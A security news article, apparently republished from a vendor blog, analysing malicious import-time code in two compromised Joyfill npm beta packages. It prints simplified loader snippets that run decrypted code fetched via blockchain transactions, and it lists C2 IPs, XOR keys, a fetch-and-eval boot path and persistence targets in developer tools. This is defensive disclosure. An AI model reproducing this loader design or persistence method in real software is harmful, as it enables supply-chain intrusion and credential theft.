{"slug": "two-joyfill-npm-beta-releases-compromised-with-blockchain-backed-remote-access", "title": "Two Joyfill npm Beta Releases Compromised With Blockchain-Backed Remote Access Trojan Loader", "summary": "Two npm beta releases in the @joyfill namespace contain an import-time JavaScript implant that resolves encrypted code through Tron, Aptos, and BNB Smart Chain transactions, ultimately delivering a 77 KB Node.js remote-access trojan. The affected packages are @joyfill/layouts@0.1.2-2773.beta.0 and @joyfill/components@4.0.0-rc24-2773-beta.4, both published on July 28, 2026, by the same npm identity. Joyfill provides SDKs for embedding forms and documents into web and mobile apps, and the compromised versions can execute arbitrary code in any process that loads them, including development environments and CI runners.", "body_md": "Two npm beta releases in the `@joyfill`\n\nnamespace contain an import-time JavaScript implant that resolves encrypted code through Tron, Aptos, and BNB Smart Chain transactions. Static analysis shows that its primary branch reaches a 77 KB Node.js remote-access trojan. A parallel branch launches a detached Node.js process, requests a separate boot payload from `23[.]27[.]13[.]43/$/boot`\n\n, sends the marker header `Sec-V: A9-0135-3`\n\n, decrypts the response, and evaluates it.\n\nJoyfill provides software development kits for embedding forms, documents, and PDFs into web and mobile applications. `@joyfill/components`\n\nsupplies the React UI components used to build, render, and edit these experiences, while `@joyfill/layouts`\n\nmanages their page and field layouts.\n\nEach package receives approximately 16,000 weekly downloads on npm. Because `@joyfill/components`\n\ndepends on `@joyfill/layouts`\n\n, these figures overlap and should not be combined into a single download total. The affected versions were beta releases, so overall weekly downloads do not indicate how many users installed the compromised beta versions.\n\n## Affected Packages[#](#Affected-Packages)\n\nNeither uses an npm lifecycle hook. The functional layouts implant runs when Node.js loads the CommonJS package entrypoint, so `npm install --ignore-scripts`\n\ndoes not prevent execution once the affected module is imported.\n\nThe loader has exact PolinRider-family indicators, including its multi-chain resolver structure, global markers, and XOR keys. The recovered 77 KB final JavaScript has the highly distinctive [Socket.IO](http://Socket.IO) command set, `Sec-V`\n\nmarker design, and developer-tool persistence associated with the DEV#POPPER malware family. These are family assessments based on direct code overlap and published technical research, not an attribution of the Joyfill compromise to a particular group.\n\n## Impact[#](#Impact)\n\nThe `@joyfill/layouts`\n\nrelease should be treated as capable of arbitrary code execution in the context of any process that loads it. This includes development environments, CI runners, test tooling, server-side rendering, and builds. The final recovered code can collect host information, establish a [Socket.IO](http://Socket.IO) remote-control channel, execute supplied JavaScript or shell commands, upload files, read clipboard data, and modify files belonging to developer tools.\n\n`@joyfill/components@4.0.0-rc24-2773-beta.4`\n\ncontains the same malicious injection in `dist/index.js`\n\n, `dist/index.esm.js`\n\n, and `dist/joyfill.min.js`\n\n. Its published Rollup bundle supplies a throwing dynamic-`require`\n\nshim, preventing the loader from resolving its network dependencies in the normal bundled execution path. That limits execution in this particular artifact, but does not make the release safe or remove the evidence that the same source-level injection reached a second Joyfill package.\n\nThe preceding versions examined, `@joyfill/layouts@0.1.1`\n\nand `@joyfill/components@4.0.0-rc24`\n\n, do not contain the implant. Other public `@joyfill`\n\npackages checked during this analysis did not contain this signature.\n\n## How the packages were compromised[#](#How-the-packages-were-compromised)\n\nBoth malicious versions use the `2773`\n\nprerelease build marker and were published by the same npm identity using Node.js `18.20.0`\n\nand npm `10.5.0`\n\n:\n\n`@joyfill/layouts@0.1.2-2773.beta.0`\n\n: `2026-07-28T10:54:57.311Z`\n\n`@joyfill/components@4.0.0-rc24-2773-beta.4`\n\n: `2026-07-28T11:03:59.568Z`\n\nThe layouts source map attributes the appended implant to `src/utils/reactGridLayoutUtils.js`\n\n; the emitted source maps for both packages include the implant’s own identifiers. This establishes that the code was present at bundle time rather than inserted only into a final tarball. It does not, on its own, identify whether the initial access was to a developer workstation, source repository, CI environment, or publishing credential.\n\n## Technical Analysis[#](#Technical-Analysis)\n\n### Stage 0: Module-load bootstrap\n\nThe implant is appended after legitimate package code. It begins with several layers of JavaScript obfuscation: a seeded character shuffle, a small decoded string table, a word-substitution decompressor, and dynamic `Function`\n\nconstruction. The recovered table contains `r`\n\n, `object`\n\n, and `m`\n\n.\n\nIn the layouts CommonJS bundle, the implant exposes Node.js module primitives through globals, then runs the decoded resolver:\n\n```\n// Simplified and normalized from the layouts CommonJS bundle.\nglobal.r = require;\nglobal.m = module;\n\nconst resolver = decryptEmbeddedPayload();\nFunction(\"\", resolver)();\n```\n\nThe bootstrap sets `global._V`\n\nto `A9-0135-3`\n\n, retains a 30-second process-global throttle in `_p_t`\n\n, and launches two separate payload-resolution paths. One evaluates its result in the importing process. The other uses `child_process.spawn(\"node\", [\"-e\", payload])`\n\nwith `detached: true`\n\n, `stdio: \"ignore\"`\n\n, and `windowsHide: true`\n\n, then calls `unref()`\n\n.\n\nThis is why the implant is not an install-hook attack: package loading is sufficient to begin the chain.\n\n### Stage 1: Blockchain-backed dispatch\n\nThe first resolver obtains a BSC transaction hash from the latest outbound transaction of a hard-coded Tron address. If that fails, it queries an Aptos account and reads `payload.arguments[0]`\n\n. It then retrieves the BSC transaction through `eth_getTransactionByHash`\n\n, reverses and decodes the transaction input, splits it on `?.?`\n\n, XOR-decrypts one segment, and evaluates the resulting JavaScript.\n\n``` js\n// Simplified and normalized from the recovered resolver.\nconst pointer = await resolveFromTronOrAptos();\nconst tx = await bscRpc(\"eth_getTransactionByHash\", [pointer]);\nconst decoded = decodeAndReverse(tx.result.input.slice(2));\nconst nextStage = xor(decoded.split(\"?.?\")[1], key);\neval(nextStage);\n```\n\nThe in-process route uses the following values:\n\n- Tron:\n`TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP`\n\n- Aptos fallback:\n`0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e`\n\n- XOR key:\n`2[gWfGj;<:-93Z^C`\n\n- BSC payload transaction:\n`0x18a8420f727f2405f9d1805ad887b31029b584b2ff5a7ec0f57c72635183e99d`\n\nThe detached branch uses a distinct set:\n\n- Tron:\n`TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG`\n\n- Aptos fallback:\n`0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3`\n\n- XOR key:\n`m6:tTh^D)cBz?NM]`\n\n- BSC payload transaction:\n`0x7ffb4efddd96e20aec90724be2ac9a71c138a9af697b9fb8224bbf80ea4f22be`\n\nThe use of public blockchain data makes payload selection mutable without a new npm publication. Blocking a conventional C2 domain alone would not stop this initial retrieval sequence.\n\n### The first recovered payload: C2 selection and a second blockchain hop\n\nThe first in-process payload is a 5,849-byte JavaScript loader, SHA-256 `cb46f12d70824ea24ed1f8bcf45bf3f86680e02a9089aafc03b27f691be57be3`\n\n. It preserves its loader source in globals, configures C2 values based on `_V`\n\n, and runs the same Tron or Aptos to BSC resolution method a second time.\n\nFor the Joyfill marker `A9-0135-3`\n\n, the loader sets the [Socket.IO](http://Socket.IO) endpoint to `166[.]88[.]134[.]62:443`\n\nand the upload host to `166[.]88[.]134[.]62`\n\n. It also contains alternate profiles for `198[.]105[.]127[.]210`\n\nand `23[.]27[.]202[.]27`\n\n, including port `27017`\n\nfor the latter.\n\nThe tier-two resolver uses:\n\n- Tron:\n`TA48dct6rFW8BXsiLAtjFaVFoSuryMjD3v`\n\n- Aptos fallback:\n`0x533b2dbcaeff19cd1f799234a27b578d713d8fcaa341b7501e4526106483e0b1`\n\n- BSC payload transaction:\n`0xb6c725890be6890fd2c735eedc47e24b85a350301f6c19a3864e43c35e470968`\n\n- XOR key:\n`2[gWfGj;<:-93Z^C`\n\nThat transaction yields the final 77,276-byte `clientCode`\n\npayload, SHA-256 `26351aed0397158d3a3b8cc8fd3047d4c015d264c9895f10f20f1521b974ed18`\n\n. This is a directly recovered Joyfill downstream stage, not a capability assessment inferred only from a related incident.\n\n### The parallel second stage: Detached `/$/boot`\n\ndownloader\n\nThe second primary payload is a 3,525-byte JavaScript bootstrap, SHA-256 `78f0de8682e0e894a5784eb7e95db4da6088f528918ca3107dd1e76f80a561d8`\n\n. It is started through the detached `node -e`\n\npath described above. Its C2 selector is independent of the 77 KB RAT branch.\n\nFor a marker beginning with `A`\n\n, which includes `A9-0135-3`\n\n, this branch selects `23[.]27[.]13[.]43`\n\n. It sends a Windows Chrome user agent and the header `Sec-V: A9-0135-3`\n\nin a request to `/$/boot`\n\n. It XOR-decrypts the response using `ThZG+0jfXE6VAGOJ`\n\nand calls `eval()`\n\non the result.\n\nThe same bootstrap carries fallback profiles for `198[.]105[.]127[.]210`\n\nand `23[.]27[.]202[.]27:27017`\n\n. This establishes that `23[.]27[.]13[.]43`\n\n, `/$/boot`\n\n, and the `Sec-V`\n\nheader are direct Joyfill code findings. The response body itself was retrieved from a disposable analysis VM, not this branch’s origin host, and is characterized below.\n\nThis is a redundant delivery branch, not a harmless fallback. It is detached from the importing Node.js process and can continue after a build, test, or CLI command exits.\n\n### Final recovered payload: Node.js remote-access trojan\n\nThe final `clientCode`\n\npayload is heavily obfuscated with control-flow flattening and an LZ-String-compressed table of 337 recovered strings. It is versioned `260605`\n\nand includes `socket.io-client`\n\n. It identifies the host to the configured [Socket.IO](http://Socket.IO) service with values including a client UUID, process ID, hostname, operating-system details, and session timestamps.\n\nIts command vocabulary includes `ss_info`\n\n, `ss_ip`\n\n, `ss_cb`\n\n, `ss_upf`\n\n, `ss_upd`\n\n, `ss_dir`\n\n, `ss_fcd`\n\n, `ss_stop`\n\n, `ss_inz`\n\n, `ss_inzx`\n\n, `ss_connect`\n\n, `ss_eval`\n\n, `ss_eval64`\n\n, `ss_exit`\n\n, and `ss_exit_f`\n\n. The code supports supplied JavaScript evaluation, interpreter and shell execution, file management, and upload. It installs `axios`\n\nand `socket.io-client`\n\ninto its working directory when dependencies are missing.\n\nThe final payload includes these additional behaviors:\n\n- Uploads files to the configured upload host at\n`/u/f`\n\nusing multipart form data and a `client_id`\n\n. - Retrieves additional JavaScript through\n`/0x/js?_V=<version>&id=<id>`\n\n. - Uses\n`/verify-human/`\n\nfor status or check-in handling. - Collects basic host details, Windows process listings, and public IP details through\n`ip-api[.]com`\n\n. - Reads clipboard data through PowerShell on Windows,\n`pbpaste`\n\non macOS, and `xclip`\n\nor `xsel`\n\non Linux. - Avoids execution on several development, CI, or sandbox hostnames, including\n`github-runner`\n\n, `buildbot`\n\n, `buildkitsandbox`\n\n, and `microsoft-standard-WSL2`\n\n.\n\nThe payload can persist by inserting a self-reloading block into application files that are routinely executed by developer tooling. Its targets include the `@vscode/deviceid`\n\nmodule inside VS Code, Cursor, and Antigravity; Discord Desktop’s core module; GitHub Desktop’s `resources/app/main.js`\n\n; and the global npm CLI at `node_modules/npm/lib/cli.js`\n\n. The injection tags include `/*C250617A*/`\n\n, `/*C250618A*/`\n\n, `/*C250619A*/`\n\n, `/*C250620A*/`\n\n, `/*C260511A*/`\n\n, `/*C260512A*/`\n\n, and `/*RS260605*/`\n\n.\n\n### Retrieved boot captures and Python credential stealer\n\nTwo live `/$/boot`\n\nresponse bodies decrypt with the same `ThZG+0jfXE6VAGOJ`\n\nkey used by the Joyfill detached branch. Their decoded bootstraps are 66,040 and 65,438 bytes, with SHA-256 values `26e679eaf1e9baeb7c55eb48db482301171d4d26e1728544b23734a90dc70e1b`\n\nand `2cfede38fb121a71a2f3607474aa8cd588a99f51b37e5e6f0d8cb789fa275032`\n\n. The saved response headers are time-stamped July 28, 2026, but do not retain enough request provenance to cryptographically associate either response with a particular infected Joyfill host. They are therefore treated as matching downstream captures, not as proof that every Joyfill execution received the same response.\n\nBoth bootstraps use additional obfuscated Base64 and RC4 string recovery, report status to `/verify-human/{campaign}`\n\nand `/snv`\n\n, and avoid a broad set of cloud, CI, container, sandbox, and analysis environments. They can install or use `axios`\n\nand `socket.io-client`\n\n, provision Python using `/d/python.zip`\n\n, `/d/7zr.exe`\n\n, and `/d/python.7z`\n\n, then request a Python payload from `/$/{id}`\n\nwith the same `Sec-V`\n\nheader. One preserved bootstrap also reloads the 77 KB `clientCode`\n\nRAT by using the same tier-two blockchain pointers as the Joyfill in-process branch.\n\nA captured `/$/1`\n\npayload decodes to an 82,457-byte Python infostealer, SHA-256 `36ff00b45e67baa7e3674b0c80f48e88737264c61e5c6b3b091200972de8157c`\n\n. Its source is cross-platform and collects environment and host information, Windows Credential Manager and Linux Secret Service data, Chromium and Firefox browser data, browser-extension storage for wallets and password managers, Git credentials, GitHub CLI configuration, VS Code storage, and GitHub Desktop logs. It supports DPAPI, macOS Keychain, and Linux Secret Service or KWallet handling for browser decryption. We assess with medium likelihood that this is an iteration of the OmniStealer malware.\n\nThe Python code stages collected data under `%USERPROFILE%\\\\.npm`\n\nor `/tmp/.npm`\n\n, creates an AES-encrypted ZIP using `pyzipper`\n\n, registers metadata at `/u/e`\n\n, and uploads the archive to `/u/f`\n\n. It can also send a document through Telegram when C2 supplies a bot token and chat ID. Its embedded archive password is `,./,./,./`\n\n. These captures were retrieved once, from a disposable VM, with no request provenance tying either response to a specific infected host, so they are reported as matching downstream samples rather than as proof of what every Joyfill execution receives.\n\n### PolinRider and DEV#POPPER relationship\n\nThe loader’s `rmcej%otb%`\n\nmarker, `global`\n\nnaming pattern, exact multi-chain resolution order, and XOR keys match the PolinRider-associated blockchain loader analyzed in [Socket’s PHP supply-chain investigation](https://socket.dev/blog/famous-chollima-targets-php-developers-through-compromised-packagist-package). The recovered Joyfill client then matches the DEV#POPPER family on more specific operational indicators: `Sec-V`\n\nand `/$/boot`\n\n, the `ThZG+0jfXE6VAGOJ`\n\ndecryptor key, [Socket.IO](http://Socket.IO) use, the `ss_*`\n\ncommand set, and persistence through developer-tool files.\n\nThe `/$/boot`\n\nand Python captures described above confirm the same follow-on is live in this campaign’s own infrastructure, using this campaign’s own keys and markers, not an inferred capability carried over from a different incident.\n\nThis campaign overlaps significantly with an incident analysed by eSentire eariler in 2026, in which DEV#POPPER was used to load DEV#POPPER RAT and OmniStealer. While in that case, the sourced was a weaponized clone of the Github repo “ShoeVista,” this attack appears to have been due to maintainer compromise.\n\n## Recommendations[#](#Recommendations)\n\n### For Developers\n\nRemove both affected versions from lockfiles, caches, internal mirrors, build images, and deployment artifacts. Pin to an independently verified version (`@joyfill/layouts@0.1.1`\n\n, `@joyfill/components@4.0.0-rc24`\n\n) and prevent the affected versions from being restored by automated resolution. Avoid the `beta`\n\ndist-tag for these packages until Joyfill confirms remediation.\n\n`npm install --ignore-scripts`\n\ndoes not help here. The implant runs at import time, not at install time, so any process that loads the module, including test runners, SSR, and bundlers, is sufficient to trigger it.\n\n### For Security Teams\n\nTreat any machine that imported `@joyfill/layouts@0.1.2-2773.beta.0`\n\nor `@joyfill/components@4.0.0-rc24-2773-beta.4`\n\nas potentially compromised, not just at risk of data theft: the recovered RAT provides an interactive remote shell. Isolate the host, preserve logs and dependency artifacts, and rotate credentials reachable from the affected Node.js process before doing anything else, from a separate, uncompromised machine.\n\nInvestigate unexpected modifications to `@vscode/deviceid`\n\nunder VS Code, Cursor, and Antigravity, Discord Desktop’s core module, GitHub Desktop’s `resources/app/main.js`\n\n, and the global npm CLI (`npm root -g`\n\n), since the implant persists there independent of the package itself. If the Python follow-on may have run, also check for `%USERPROFILE%\\.npm`\n\nor `/tmp/.npm`\n\nstaging directories and rotate browser-saved passwords, cookies, and any wallet or password-manager browser-extension data on that host, not only developer-tool credentials.\n\nReview endpoint and CI telemetry for detached Node.js processes, the four C2 IPs, the `Sec-V`\n\nheader, and outbound requests to `api[.]trongrid[.]io`\n\nor `bsc-dataseed[.]binance[.]org`\n\nfrom build agents or developer workstations. Blockchain RPC traffic from a CI runner is a high-fidelity signal on its own. Block both package versions in your registry proxy or dependency policy tooling.\n\n## MITRE ATT&CK[#](#MITRE-ATTandCK)\n\n`T1195.002`\n\nCompromise Software Supply Chain`T1027`\n\nObfuscated Files or Information`T1027.013`\n\nEncrypted or Encoded File`T1059.007`\n\nJavaScript`T1059.006`\n\nPython`T1059.004`\n\nUnix Shell`T1071.001`\n\nWeb Protocols`T1105`\n\nIngress Tool Transfer`T1115`\n\nClipboard Data\n\n## Indicators of Compromise[#](#Indicators-of-Compromise)\n\n### npm packages and files\n\n`@joyfill/layouts@0.1.2-2773.beta.0`\n\n`@joyfill/components@4.0.0-rc24-2773-beta.4`\n\n- Layouts:\n`dist/index.cjs.js`\n\n, `dist/index.es.js`\n\n- Components:\n`dist/index.js`\n\n, `dist/index.esm.js`\n\n, `dist/joyfill.min.js`\n\n### SHA-256\n\n- Layouts archive:\n`adc4af90540d33cd1e98f44b51482ae9250fbeb97d6f8d7841c81b618cb2c6e6`\n\n- Layouts CommonJS bundle:\n`8e8b90dedd456ded0c5748119836e1ca1066112bc569c1b41ca70eb931d1d4dc`\n\n- Layouts ESM bundle:\n`5f6a92006ca2ea4b464d66fb41af777edce7296939a7c6ee491e2b3cbfe09848`\n\n- Components archive:\n`bcc93dc55bc7daedf4ca57254f0e7a7f1c40e09851eab98fe10cde801982db17`\n\n- Components\n`dist/index.js`\n\n: `1352ad22c99983d91e600348b7cbf58235131b1ee34cea9f09623206d5b7dea7`\n\n- Components\n`dist/index.esm.js`\n\n: `67c6ef602cc850f10d935fee53fa40440df841adf081563bf4fc2631a71249ce`\n\n- Components\n`dist/joyfill.min.js`\n\n: `c5742ea1875ecd2360022624149994909cd0546e221e4203dffd01f48de45469`\n\n- In-process first payload:\n`cb46f12d70824ea24ed1f8bcf45bf3f86680e02a9089aafc03b27f691be57be3`\n\n- Decoded tier-two resolver:\n`f452f9cfa539f4a1fe25187a99a484391290d5dbaa422ba455edf6b04f81b7d1`\n\n- Detached second payload:\n`78f0de8682e0e894a5784eb7e95db4da6088f528918ca3107dd1e76f80a561d8`\n\n- Decoded detached bootstrap:\n`ae7565109fd01b88d82acf7f73ab20709cbc2c9f26fdea13e429ccc87a55d4fb`\n\n- Final\n`clientCode`\n\nRAT: `26351aed0397158d3a3b8cc8fd3047d4c015d264c9895f10f20f1521b974ed18`\n\n- Preserved\n`/$/boot`\n\ncapture: `26e679eaf1e9baeb7c55eb48db482301171d4d26e1728544b23734a90dc70e1b`\n\n- Preserved\n`/$/boot`\n\ncapture: `2cfede38fb121a71a2f3607474aa8cd588a99f51b37e5e6f0d8cb789fa275032`\n\n- Preserved Python stealer capture:\n`36ff00b45e67baa7e3674b0c80f48e88737264c61e5c6b3b091200972de8157c`\n\n### Network and protocol indicators\n\n`api[.]trongrid[.]io`\n\n`fullnode[.]mainnet[.]aptoslabs[.]com`\n\n`bsc-dataseed[.]binance[.]org`\n\n`bsc-rpc[.]publicnode[.]com`\n\n`166[.]88[.]134[.]62:443`\n\n`166[.]88[.]134[.]62:80`\n\n`23[.]27[.]13[.]43/$/boot`\n\n`198[.]105[.]127[.]210:443`\n\n`198[.]105[.]127[.]210:80`\n\n`23[.]27[.]202[.]27:443`\n\n`23[.]27[.]202[.]27:27017`\n\n### Blockchain identifiers and loader fingerprints\n\n`TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP`\n\n`TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG`\n\n`TA48dct6rFW8BXsiLAtjFaVFoSuryMjD3v`\n\n`0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e`\n\n`0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3`\n\n`0x533b2dbcaeff19cd1f799234a27b578d713d8fcaa341b7501e4526106483e0b1`\n\n`0x18a8420f727f2405f9d1805ad887b31029b584b2ff5a7ec0f57c72635183e99d`\n\n`0x7ffb4efddd96e20aec90724be2ac9a71c138a9af697b9fb8224bbf80ea4f22be`\n\n`0xb6c725890be6890fd2c735eedc47e24b85a350301f6c19a3864e43c35e470968`\n\n`0x9bc1355344b54dedf3e44296916ed15653844509`", "url": "https://wpnews.pro/news/two-joyfill-npm-beta-releases-compromised-with-blockchain-backed-remote-access", "canonical_source": "https://socket.dev/blog/joyfill-npm-beta-releases-compromised?utm_medium=feed", "published_at": "2026-07-28 14:34:42+00:00", "updated_at": "2026-07-28 15:43:42.845170+00:00", "lang": "en", "topics": ["ai-tools", "developer-tools"], "entities": ["Joyfill", "@joyfill/layouts", "@joyfill/components", "npm", "Tron", "Aptos", "BNB Smart Chain", "Socket.IO"], "alternates": {"html": "https://wpnews.pro/news/two-joyfill-npm-beta-releases-compromised-with-blockchain-backed-remote-access", "markdown": "https://wpnews.pro/news/two-joyfill-npm-beta-releases-compromised-with-blockchain-backed-remote-access.md", "text": "https://wpnews.pro/news/two-joyfill-npm-beta-releases-compromised-with-blockchain-backed-remote-access.txt", "jsonld": "https://wpnews.pro/news/two-joyfill-npm-beta-releases-compromised-with-blockchain-backed-remote-access.jsonld"}}